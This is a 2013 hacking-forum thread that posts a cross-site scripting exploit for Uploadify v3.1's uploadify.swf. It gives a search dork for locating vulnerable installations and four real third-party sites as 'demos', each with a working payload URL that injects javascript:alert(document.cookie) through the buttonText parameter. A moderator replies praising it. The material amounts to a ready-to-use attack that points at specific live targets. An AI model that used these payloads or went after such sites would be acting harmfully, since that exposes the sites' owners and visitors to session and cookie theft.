HomeclosedFAQRegisterLog in

Share | 
 

 Uploadify v3.1 XSS Vulnerability

Go down 
AuthorMessage
V1P3R
WhiteHat Support
WhiteHat Support
avatar

Posts : 76
White Hat Points : 202
White Hat Reputation : 10
Join date : 2013-07-30

PostSubject: Uploadify v3.1 XSS Vulnerability    Mon Sep 09, 2013 5:49 pm

===============================
Title : Uploadify v3.1 XSS Vulnerability
# Date: 2013-09-1
# Software Link: [You must be registered and logged in to see this link.]
# Founded by: ''Master Zombie''
# Tested on: Windows XP SP3
# Category: [webapps]
# Dork : inurl:admin/include/uploadify
===============================

Exploit path:
Code:
http://127.0.0.1/admin/include/uploadify/uploadify.swf?buttonText=<a href=[ XSS ]
Demo Sites :
Code:
http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>V1P3R</a>
Code:
http://photos.davidandginny.co.uk/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>V1P3R</a>
Code:
http://landevejsridder.dk/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>V1P3R</a>
Code:
http://massecritique.agora.eu.org/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>V1P3R</a>

_________________
Mess with the Best, Die like the Rest
Back to top Go down
WizkiD
WhiteHat Senior MOD
WhiteHat Senior MOD
avatar

Posts : 45
White Hat Points : 121
White Hat Reputation : 2
Join date : 2013-07-30

PostSubject: Re: Uploadify v3.1 XSS Vulnerability    Mon Sep 09, 2013 6:07 pm

Nice XSS. Thanks for sharing Very Happy

_________________
[You must be registered and logged in to see this image.]
"Follow your Curiosity"
Back to top Go down
 
Uploadify v3.1 XSS Vulnerability
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical White Hat Hackers :: White Hat Hackers Community :: Hacking & Security Tutorials-
Jump to: